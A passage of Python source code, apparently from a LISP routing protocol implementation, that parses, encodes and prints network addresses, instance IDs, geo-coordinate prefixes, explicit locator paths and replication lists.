addr = struct.unpack(packet_format, packet[:format_size])
if (self.is_ipv4()):
self.address = socket.ntohl(addr[0])
elif (self.is_ipv6()):
#
# Sigh, we have a high-order byte with zero-fill issue when
# parsing a binary IPv6 address from a packet. If we have an
# address that starts with fe::, then addr[0] is one byte in
# length and byte-swapping is not necessary (or we would make
# the high-order 16 bits 00fe). Sigh.
#
if (addr[0] <= 0xffff and (addr[0] & 0xff) == 0):
high = (addr[0] << 48) << 64
else:
high = byte_swap_64(addr[0]) << 64
#endif
low = byte_swap_64(addr[1])
self.address = high | low
elif (self.is_mac()):
short1 = addr[0]
short2 = addr[1]
short3 = addr[2]
self.address = (short1 << 32) + (short2 << 16) + short3
elif (self.is_e164()):
self.address = (addr[0] << 32) + addr[1]
elif (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
format_size = 0
#endif
packet = packet[format_size::]
return(packet)
#enddef
def is_ipv4(self):
return(True if (self.afi == LISP_AFI_IPV4) else False)
#enddef
def is_ipv4_link_local(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 16) & 0xffff) == 0xa9fe)
#enddef
def is_ipv4_loopback(self):
if (self.is_ipv4() == False): return(False)
return(self.address == 0x7f000001)
#enddef
def is_ipv4_multicast(self):
if (self.is_ipv4() == False): return(False)
return(((self.address >> 24) & 0xf0) == 0xe0)
#enddef
def is_ipv4_string(self, addr_str):
return(addr_str.find(".") != -1)
#enddef
def is_ipv6(self):
return(True if (self.afi == LISP_AFI_IPV6) else False)
#enddef
def is_ipv6_link_local(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 112) & 0xffff) == 0xfe80)
#enddef
def is_ipv6_string_link_local(self, addr_str):
return(addr_str.find("fe80::") != -1)
#enddef
def is_ipv6_loopback(self):
if (self.is_ipv6() == False): return(False)
return(self.address == 1)
#enddef
def is_ipv6_multicast(self):
if (self.is_ipv6() == False): return(False)
return(((self.address >> 120) & 0xff) == 0xff)
#enddef
def is_ipv6_string(self, addr_str):
return(addr_str.find(":") != -1)
#enddef
def is_mac(self):
return(True if (self.afi == LISP_AFI_MAC) else False)
#enddef
def is_mac_multicast(self):
if (self.is_mac() == False): return(False)
return((self.address & 0x010000000000) != 0)
#enddef
def is_mac_broadcast(self):
if (self.is_mac() == False): return(False)
return(self.address == 0xffffffffffff)
#enddef
def is_mac_string(self, addr_str):
return(len(addr_str) == 15 and addr_str.find("-") != -1)
#enddef
def is_link_local_multicast(self):
if (self.is_ipv4()):
return((0xe0ffff00 & self.address) == 0xe0000000)
#endif
if (self.is_ipv6()):
return((self.address >> 112) & 0xffff == 0xff02)
#endif
return(False)
#enddef
def is_null(self):
return(True if (self.afi == LISP_AFI_NONE) else False)
#enddef
def is_ultimate_root(self):
return(True if self.afi == LISP_AFI_ULTIMATE_ROOT else False)
#enddef
def is_iid_range(self):
return(True if self.afi == LISP_AFI_IID_RANGE else False)
#enddef
def is_e164(self):
return(True if (self.afi == LISP_AFI_E164) else False)
#enddef
def is_dist_name(self):
return(True if (self.afi == LISP_AFI_NAME) else False)
#enddef
def is_geo_prefix(self):
return(True if (self.afi == LISP_AFI_GEO_COORD) else False)
#enddef
def is_binary(self):
if (self.is_dist_name()): return(False)
if (self.is_geo_prefix()): return(False)
return(True)
#enddef
def store_address(self, addr_str):
if (self.afi == LISP_AFI_NONE): self.string_to_afi(addr_str)
#
# Parse instance-id.
#
i = addr_str.find("[")
j = addr_str.find("]")
if (i != -1 and j != -1):
self.instance_id = int(addr_str[i+1:j])
addr_str = addr_str[j+1::]
if (self.is_dist_name() == False):
addr_str = addr_str.replace(" ", "")
#endif
#endif
#
# Parse AFI based address.
#
if (self.is_ipv4()):
octet = addr_str.split(".")
value = int(octet[0]) << 24
value += int(octet[1]) << 16
value += int(octet[2]) << 8
value += int(octet[3])
self.address = value
elif (self.is_ipv6()):
#
# There will be a common IPv6 address input mistake that will
# occur. The address ff::/8 (or an address ff::1) is actually
# encoded as 0x00ff as the high-order 16-bits. The correct way to
# specify the prefix is ff00::/8 but one would wonder why the
# lower order 0x00 bits are needed if a /8 is used. So to
# summarize:
#
# Entering ff::/8 will give you the 0::/8 prefix.
# Entering ff00::/8 is not the same as ff00::/16.
#
# Allow user to specify ff::/8 which allows for placing the the
# byte in the high-order byte of the 128-bit quantity. Check
# for double-colon in the input string to detect the single byte
# and then below byte-swap the first 2-bytes.
#
odd_byte = (addr_str[2:4] == "::")
try:
addr_str = socket.inet_pton(socket.AF_INET6, addr_str)
except:
addr_str = socket.inet_pton(socket.AF_INET6, "0::0")
#endtry
addr_str = binascii.hexlify(addr_str)
if (odd_byte):
addr_str = addr_str[2:4] + addr_str[0:2] + addr_str[4::]
#endif
self.address = int(addr_str, 16)
elif (self.is_geo_prefix()):
geo = lisp_geo(None)
geo.name = "geo-prefix-{}".format(geo)
geo.parse_geo_string(addr_str)
self.address = geo
elif (self.is_mac()):
addr_str = addr_str.replace("-", "")
value = int(addr_str, 16)
self.address = value
elif (self.is_e164()):
addr_str = addr_str[1::]
value = int(addr_str, 16)
self.address = value << 4
elif (self.is_dist_name()):
self.address = addr_str.replace("'", "")
#endif
self.mask_len = self.host_mask_len()
#enddef
def store_prefix(self, prefix_str):
if (self.is_geo_string(prefix_str)):
index = prefix_str.find("]")
mask_len = len(prefix_str[index+1::]) * 8
elif (prefix_str.find("/") != -1):
prefix_str, mask_len = prefix_str.split("/")
else:
left = prefix_str.find("'")
if (left == -1): return
right = prefix_str.find("'", left+1)
if (right == -1): return
mask_len = len(prefix_str[left+1:right]) * 8
#endif
self.string_to_afi(prefix_str)
self.store_address(prefix_str)
self.mask_len = int(mask_len)
#enddef
def zero_host_bits(self):
if (self.mask_len < 0): return
mask = (2 ** self.mask_len) - 1
shift = self.addr_length() * 8 - self.mask_len
mask <<= shift
self.address &= mask
#enddef
def is_geo_string(self, addr_str):
index = addr_str.find("]")
if (index != -1): addr_str = addr_str[index+1::]
geo = addr_str.split("/")
if (len(geo) == 2):
if (geo[1].isdigit() == False): return(False)
#endif
geo = geo[0]
geo = geo.split("-")
geo_len = len(geo)
if (geo_len < 8 or geo_len > 9): return(False)
for num in range(0, geo_len):
if (num == 3):
if (geo[num] in ["N", "S"]): continue
return(False)
#enif
if (num == 7):
if (geo[num] in ["W", "E"]): continue
return(False)
#endif
if (geo[num].isdigit() == False): return(False)
#endfor
return(True)
#enddef
def string_to_afi(self, addr_str):
if (addr_str.count("'") == 2):
self.afi = LISP_AFI_NAME
return
#endif
if (addr_str.find(":") != -1): self.afi = LISP_AFI_IPV6
elif (addr_str.find(".") != -1): self.afi = LISP_AFI_IPV4
elif (addr_str.find("+") != -1): self.afi = LISP_AFI_E164
elif (self.is_geo_string(addr_str)): self.afi = LISP_AFI_GEO_COORD
elif (addr_str.find("-") != -1): self.afi = LISP_AFI_MAC
else: self.afi = LISP_AFI_NONE
#enddef
def print_address(self):
addr = self.print_address_no_iid()
iid = "[" + str(self.instance_id)
for i in self.iid_list: iid += "," + str(i)
iid += "]"
addr = "{}{}".format(iid, addr)
return(addr)
#enddef
def print_address_no_iid(self):
if (self.is_ipv4()):
addr = self.address
value1 = addr >> 24
value2 = (addr >> 16) & 0xff
value3 = (addr >> 8) & 0xff
value4 = addr & 0xff
return("{}.{}.{}.{}".format(value1, value2, value3, value4))
elif (self.is_ipv6()):
addr_str = lisp_hex_string(self.address).zfill(32)
addr_str = binascii.unhexlify(addr_str)
addr_str = socket.inet_ntop(socket.AF_INET6, addr_str)
return("{}".format(addr_str))
elif (self.is_geo_prefix()):
return("{}".format(self.address.print_geo()))
elif (self.is_mac()):
addr_str = lisp_hex_string(self.address).zfill(12)
addr_str = "{}-{}-{}".format(addr_str[0:4], addr_str[4:8],
addr_str[8:12])
return("{}".format(addr_str))
elif (self.is_e164()):
addr_str = lisp_hex_string(self.address).zfill(15)
return("+{}".format(addr_str))
elif (self.is_dist_name()):
return("'{}'".format(self.address))
elif (self.is_null()):
return("no-address")
#endif
return("unknown-afi:{}".format(self.afi))
#enddef
def print_prefix(self):
if (self.is_ultimate_root()): return("[*]")
if (self.is_iid_range()):
if (self.mask_len == 32): return("[{}]".format(self.instance_id))
upper = self.instance_id + (2**(32 - self.mask_len) - 1)
return("[{}-{}]".format(self.instance_id, upper))
#endif
addr = self.print_address()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
index = addr.find("no-address")
if (index == -1):
addr = "{}/{}".format(addr, str(self.mask_len))
else:
addr = addr[0:index]
#endif
return(addr)
#enddef
def print_prefix_no_iid(self):
addr = self.print_address_no_iid()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
return("{}/{}".format(addr, str(self.mask_len)))
#enddef
def print_prefix_url(self):
if (self.is_ultimate_root()): return("0--0")
addr = self.print_address()
index = addr.find("]")
if (index != -1): addr = addr[index+1::]
if (self.is_geo_prefix()):
addr = addr.replace("/", "-")
return("{}-{}".format(self.instance_id, addr))
#endif
return("{}-{}-{}".format(self.instance_id, addr, self.mask_len))
#enddef
def print_sg(self, g):
s = self.print_prefix()
si = s.find("]") + 1
g = g.print_prefix()
gi = g.find("]") + 1
sg_str = "[{}]({}, {})".format(self.instance_id, s[si::], g[gi::])
return(sg_str)
#enddef
def hash_address(self, addr):
addr1 = self.address
addr2 = addr.address
if (self.is_geo_prefix()): addr1 = self.address.print_geo()
if (addr.is_geo_prefix()): addr2 = addr.address.print_geo()
if (type(addr1) == str):
addr1 = int(binascii.hexlify(addr1[0:1]))
#endif
if (type(addr2) == str):
addr2 = int(binascii.hexlify(addr2[0:1]))
#endif
return(addr1 ^ addr2)
#enddef
#
# Is self more specific or equal to the prefix supplied in variable
# 'prefix'. Return True if so.
#
def is_more_specific(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT): return(True)
mask_len = prefix.mask_len
if (prefix.afi == LISP_AFI_IID_RANGE):
size = 2**(32 - mask_len)
lower = prefix.instance_id
upper = lower + size
return(self.instance_id in range(lower, upper))
#endif
if (self.instance_id != prefix.instance_id): return(False)
if (self.afi != prefix.afi):
if (prefix.afi != LISP_AFI_NONE): return(False)
#endif
#
# Handle string addresses like distinguished names and geo-prefixes.
#
if (self.is_binary() == False):
if (prefix.afi == LISP_AFI_NONE): return(True)
if (type(self.address) != type(prefix.address)): return(False)
addr = self.address
paddr = prefix.address
if (self.is_geo_prefix()):
addr = self.address.print_geo()
paddr = prefix.address.print_geo()
#endif
if (len(addr) < len(paddr)): return(False)
return(addr.find(paddr) == 0)
#endif
#
# Handle numeric addresses.
#
if (self.mask_len < mask_len): return(False)
shift = (prefix.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
return((self.address & mask) == prefix.address)
#enddef
def mask_address(self, mask_len):
shift = (self.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
self.address &= mask
#enddef
def is_exact_match(self, prefix):
if (self.instance_id != prefix.instance_id): return(False)
p1 = self.print_prefix()
p2 = prefix.print_prefix() if prefix else ""
return(p1 == p2)
#enddef
def is_local(self):
if (self.is_ipv4()):
local = lisp_myrlocs[0]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
if (self.is_ipv6()):
local = lisp_myrlocs[1]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
return(False)
#enddef
def store_iid_range(self, iid, mask_len):
if (self.afi == LISP_AFI_NONE):
if (iid is 0 and mask_len is 0): self.afi = LISP_AFI_ULTIMATE_ROOT
else: self.afi = LISP_AFI_IID_RANGE
#endif
self.instance_id = iid
self.mask_len = mask_len
#enddef
def lcaf_length(self, lcaf_type):
length = self.addr_length() + 2
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE): length += 4
if (lcaf_type == LISP_LCAF_ASN_TYPE): length += 4
if (lcaf_type == LISP_LCAF_APP_DATA_TYPE): length += 8
if (lcaf_type == LISP_LCAF_GEO_COORD_TYPE): length += 12
if (lcaf_type == LISP_LCAF_OPAQUE_TYPE): length += 0
if (lcaf_type == LISP_LCAF_NAT_TYPE): length += 4
if (lcaf_type == LISP_LCAF_NONCE_LOC_TYPE): length += 4
if (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE): length = length * 2 + 8
if (lcaf_type == LISP_LCAF_ELP_TYPE): length += 0
if (lcaf_type == LISP_LCAF_SECURITY_TYPE): length += 6
if (lcaf_type == LISP_LCAF_SOURCE_DEST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_RLE_TYPE): length += 4
return(length)
#enddef
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_iid(self):
lcaf_type = LISP_LCAF_INSTANCE_ID_TYPE
addr_length = socket.htons(self.lcaf_length(lcaf_type))
iid = self.instance_id
afi = self.afi
ml = 0
if (afi < 0):
if (self.afi == LISP_AFI_GEO_COORD):
afi = LISP_AFI_LCAF
ml = 0
else:
afi = 0
ml = self.mask_len
#endif
#endif
lcaf = struct.pack("BBBBH", 0, 0, lcaf_type, ml, addr_length)
lcaf += struct.pack("IH", socket.htonl(iid), socket.htons(afi))
if (afi == 0): return(lcaf)
if (self.afi == LISP_AFI_GEO_COORD):
lcaf = lcaf[0:-2]
lcaf += self.address.encode_geo()
return(lcaf)
#endif
lcaf += self.pack_address()
return(lcaf)
#enddef
def lcaf_decode_iid(self, packet):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
x, y, lcaf_type, iid_ml, length = struct.unpack(packet_format,
packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_INSTANCE_ID_TYPE): return(None)
packet_format = "IH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
iid, afi = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
length = socket.ntohs(length)
self.instance_id = socket.ntohl(iid)
afi = socket.ntohs(afi)
self.afi = afi
if (iid_ml != 0 and afi == 0): self.mask_len = iid_ml
if (afi == 0):
self.afi = LISP_AFI_IID_RANGE if iid_ml else LISP_AFI_ULTIMATE_ROOT
#endif
#
# No address encoded.
#
if (afi == 0): return(packet)
#
# Look for distinguished-name.
#
if (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
return(packet)
#endif
#
# Only process geo-prefixes inside of an LCAF encoded Instance-ID type.
#
if (afi == LISP_AFI_LCAF):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
return(packet)
#endif
addr_length = self.addr_length()
if (len(packet) < addr_length): return(None)
packet = self.unpack_address(packet)
return(packet)
#enddef
#
# Multicast Info Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 9 | Rsvd2 |R|L|J| 8 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Source MaskLen| Group MaskLen |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Source/Subnet Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Group Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_sg(self, group):
lcaf_type = LISP_LCAF_MCAST_INFO_TYPE
iid = socket.htonl(self.instance_id)
addr_length = socket.htons(self.lcaf_length(lcaf_type))
lcaf = struct.pack("BBBBHIHBB", 0, 0, lcaf_type, 0, addr_length, iid,
0, self.mask_len, group.mask_len)
lcaf += struct.pack("H", socket.htons(self.afi))
lcaf += self.pack_address()
lcaf += struct.pack("H", socket.htons(group.afi))
lcaf += group.pack_address()
return(lcaf)
#enddef
def lcaf_decode_sg(self, packet):
packet_format = "BBBBHIHBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
x, y, lcaf_type, rsvd, length, iid, z, sml, gml = \
struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_MCAST_INFO_TYPE): return([None, None])
self.instance_id = socket.ntohl(iid)
length = socket.ntohs(length) - 8
#
# Get AFI and source address. Validate if enough length and there
# are bytes in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
self.afi = socket.ntohs(afi)
self.mask_len = sml
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = self.unpack_address(packet)
if (packet == None): return([None, None])
length -= addr_length
#
# Get AFI and source address. Validate if enough length and there
# are bytes in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
group = lisp_address(LISP_AFI_NONE, "", 0, 0)
group.afi = socket.ntohs(afi)
group.mask_len = gml
group.instance_id = self.instance_id
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = group.unpack_address(packet)
if (packet == None): return([None, None])
return([packet, group])
#enddef
def lcaf_decode_eid(self, packet):
packet_format = "BBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
#
# Do not advance packet pointer. The specific LCAF decoders will do
# it themselves.
#
rsvd, flags, lcaf_type = struct.unpack(packet_format,
packet[:format_size])
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE):
return([self.lcaf_decode_iid(packet), None])
elif (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE):
packet, group = self.lcaf_decode_sg(packet)
return([packet, group])
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.instance_id = 0
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
#endif
return([packet, None])
#enddef
#endclass
#
# Data structure for storing learned or configured ELPs.
#
class lisp_elp_node():
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.probe = False
self.strict = False
self.eid = False
self.we_are_last = False
#enddef
def copy_elp_node(self):
elp_node = lisp_elp_node()
elp_node.copy_address(self.address)
elp_node.probe = self.probe
elp_node.strict = self.strict
elp_node.eid = self.eid
elp_node.we_are_last = self.we_are_last
return(elp_node)
#enddef
#endclass
class lisp_elp():
def __init__(self, name):
self.elp_name = name
self.elp_nodes = []
self.use_elp_node = None
self.we_are_last = False
#enddef
def copy_elp(self):
elp = lisp_elp(self.elp_name)
elp.use_elp_node = self.use_elp_node
elp.we_are_last = self.we_are_last
for elp_node in self.elp_nodes:
elp.elp_nodes.append(elp_node.copy_elp_node())
#endfor
return(elp)
#enddef
def print_elp(self, want_marker):
elp_str = ""
for elp_node in self.elp_nodes:
use_or_last = ""
if (want_marker):
if (elp_node == self.use_elp_node):
use_or_last = "*"
elif (elp_node.we_are_last):
use_or_last = "x"
#endif
#endif
elp_str += "{}{}({}{}{}), ".format(use_or_last,
elp_node.address.print_address_no_iid(),
"r" if elp_node.eid else "R", "P" if elp_node.probe else "p",
"S" if elp_node.strict else "s")
#endfor
return(elp_str[0:-2] if elp_str != "" else "")
#enddef
def select_elp_node(self):
v4, v6, device = lisp_myrlocs
index = None
for elp_node in self.elp_nodes:
if (v4 and elp_node.address.is_exact_match(v4)):
index = self.elp_nodes.index(elp_node)
break
#endif
if (v6 and elp_node.address.is_exact_match(v6)):
index = self.elp_nodes.index(elp_node)
break
#endif
#endfor
#
# If we did not find a match, this is possibly an ITR. We need to give
# if the first ELP node.
#
if (index == None):
self.use_elp_node = self.elp_nodes[0]
elp_node.we_are_last = False
return
#endif
#
# If we matched the last item in the ELP nodes, we are the end of the
# path. Flag it for display purposes and return None.
#
if (self.elp_nodes[-1] == self.elp_nodes[index]):
self.use_elp_node = None
elp_node.we_are_last = True
return
#endif
#
# Return the next node after the one that matches this system.
#
self.use_elp_node = self.elp_nodes[index+1]
return
#enddef
#endclass
class lisp_geo():
def __init__(self, name):
self.geo_name = name
self.latitude = 0xffffffff # Negative when North, otherwise South
self.lat_mins = 0
self.lat_secs = 0
self.longitude = 0xffffffff # Negative when East, otherwise West
self.long_mins = 0
self.long_secs = 0
self.altitude = -1
self.radius = 0
#enddef
def copy_geo(self):
geo = lisp_geo(self.geo_name)
geo.latitude = self.latitude
geo.lat_mins = self.lat_mins
geo.lat_secs = self.lat_secs
geo.longitude = self.longitude
geo.long_mins = self.long_mins
geo.long_secs = self.long_secs
geo.altitude = self.altitude
geo.radius = self.radius
return(geo)
#enddef
def no_geo_altitude(self):
return(self.altitude == -1)
#enddef
def parse_geo_string(self, geo_str):
index = geo_str.find("]")
if (index != -1): geo_str = geo_str[index+1::]
#
# Check if radius is specified. That is a geo-prefix and not just a
# geo-point.
#
if (geo_str.find("/") != -1):
geo_str, radius = geo_str.split("/")
self.radius = int(radius)
#endif
geo_str = geo_str.split("-")
if (len(geo_str) < 8): return(False)
latitude = geo_str[0:4]
longitude = geo_str[4:8]
#
# Get optional altitude.
#
if (len(geo_str) > 8): self.altitude = int(geo_str[8])
#
# Get latitude values.
#
self.latitude = int(latitude[0])
self.lat_mins = int(latitude[1])
self.lat_secs = int(latitude[2])
if (latitude[3] == "N"): self.latitude = -self.latitude
#
# Get longitude values.
#
self.longitude = int(longitude[0])
self.long_mins = int(longitude[1])
self.long_secs = int(longitude[2])
if (longitude[3] == "E"): self.longitude = -self.longitude
return(True)
#enddef
def print_geo(self):
n_or_s = "N" if self.latitude < 0 else "S"
e_or_w = "E" if self.longitude < 0 else "W"
geo_str = "{}-{}-{}-{}-{}-{}-{}-{}".format(abs(self.latitude),
self.lat_mins, self.lat_secs, n_or_s, abs(self.longitude),
self.long_mins, self.long_secs, e_or_w)
if (self.no_geo_altitude() == False):
geo_str += "-" + str(self.altitude)
#endif
#
# Print "/<radius>" if not 0.
#
if (self.radius != 0): geo_str += "/{}".format(self.radius)
return(geo_str)
#enddef
def geo_url(self):
zoom = os.getenv("LISP_GEO_ZOOM_LEVEL")
zoom = "10" if (zoom == "" or zoom.isdigit() == False) else zoom
lat, lon = self.dms_to_decimal()
url = ("http://maps.googleapis.com/maps/api/staticmap?center={},{}" + \
"&markers=color:blue%7Clabel:lisp%7C{},{}" + \
"&zoom={}&size=1024x1024&sensor=false").format(lat, lon, lat, lon,
zoom)
return(url)
#enddef
def print_geo_url(self):
geo = self.print_geo()
if (self.radius == 0):
url = self.geo_url()
string = "<a href='{}'>{}</a>".format(url, geo)
else:
url = geo.replace("/", "-")
string = "<a href='/lisp/geo-map/{}'>{}</a>".format(url, geo)
#endif
return(string)
#enddef
def dms_to_decimal(self):
degs, mins, secs = self.latitude, self.lat_mins, self.lat_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_lat = dd
degs, mins, secs = self.longitude, self.long_mins, self.long_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_long = dd
return((dd_lat, dd_long))
#enddef
def get_distance(self, geo_point):
dd_prefix = self.dms_to_decimal()
dd_point = geo_point.dms_to_decimal()
distance = vincenty(dd_prefix, dd_point)
return(distance.km)
#enddef
def point_in_circle(self, geo_point):
km = self.get_distance(geo_point)
return(km <= self.radius)
#enddef
def encode_geo(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
geo_len = socket.htons(20 + 2)
flags = 0
lat = abs(self.latitude)
lat_ms = ((self.lat_mins * 60) + self.lat_secs) * 1000
if (self.latitude < 0): flags |= 0x40
lon = abs(self.longitude)
lon_ms = ((self.long_mins * 60) + self.long_secs) * 1000
if (self.longitude < 0): flags |= 0x20
alt = 0
if (self.no_geo_altitude() == False):
alt = socket.htonl(self.altitude)
flags |= 0x10
#endif
radius = socket.htons(self.radius)
if (radius != 0): flags |= 0x06
pkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_GEO_COORD_TYPE,
0, geo_len)
pkt += struct.pack("BBHBBHBBHIHHH", flags, 0, 0, lat, lat_ms >> 16,
socket.htons(lat_ms & 0x0ffff), lon, lon_ms >> 16,
socket.htons(lon_ms & 0xffff), alt, radius, 0, 0)
return(pkt)
#enddef
def decode_geo(self, packet, lcaf_len, radius_hi):
packet_format = "BBHBBHBBHIHHH"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
flags, r1, uncertainty, lat, lat_hi, lat_ms, lon, lon_hi, lon_ms, \
alt, radius, r2, afi = struct.unpack(packet_format,
packet[:format_size])
#
# No nested LCAFs in Geo-Coord type.
#
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
if (flags & 0x40): lat = -lat
self.latitude = lat
lat_secs = ((lat_hi << 16) | socket.ntohs(lat_ms)) / 1000
self.lat_mins = lat_secs / 60
self.lat_secs = lat_secs % 60
if (flags & 0x20): lon = -lon
self.longitude = lon
lon_secs = ((lon_hi << 16) | socket.ntohs(lon_ms)) / 1000
self.long_mins = lon_secs / 60
self.long_secs = lon_secs % 60
self.altitude = socket.ntohl(alt) if (flags & 0x10) else -1
radius = socket.ntohs(radius)
self.radius = radius if (flags & 0x02) else radius * 1000
self.geo_name = None
packet = packet[format_size::]
if (afi != 0):
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
return(packet)
#enddef
#endclass
#
# Structure for Replication List Entries.
#
class lisp_rle_node():
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.level = 0
self.translated_port = 0
self.rloc_name = None
#enddef
def copy_rle_node(self):
rle_node = lisp_rle_node()
rle_node.address.copy_address(self.address)
rle_node.level = self.level
rle_node.translated_port = self.translated_port
rle_node.rloc_name = self.rloc_name
return(rle_node)
#enddef
def store_translated_rloc(self, rloc, port):
self.address.copy_address(rloc)
self.translated_port = port
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.address.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
#endclass
class lisp_rle():
def __init__(self, name):
self.rle_name = name
self.rle_nodes = []
self.rle_forwarding_list = []
#enddef
def copy_rle(self):
rle = lisp_rle(self.rle_name)
for rle_node in self.rle_nodes:
rle.rle_nodes.append(rle_node.copy_rle_node())
#endfor
rle.build_forwarding_list()
return(rle)
#enddef
def print_rle(self, html):
rle_str = ""
for rle_node in self.rle_nodes:
port = rle_node.translated_port
rle_name_str = blue(rle_node.rloc_name, html) if \
rle_node.rloc_name != None else ""
addr_str = rle_node.address.print_address_no_iid()
if (rle_node.address.is_local()): addr_str = red(addr_str, html)
rle_str += "{}{}(L{}){}, ".format(addr_str, "" if port == 0 \
else ":" + str(port), rle_node.level,
"" if rle_node.rloc_name == None else rle_name_str)
#endfor
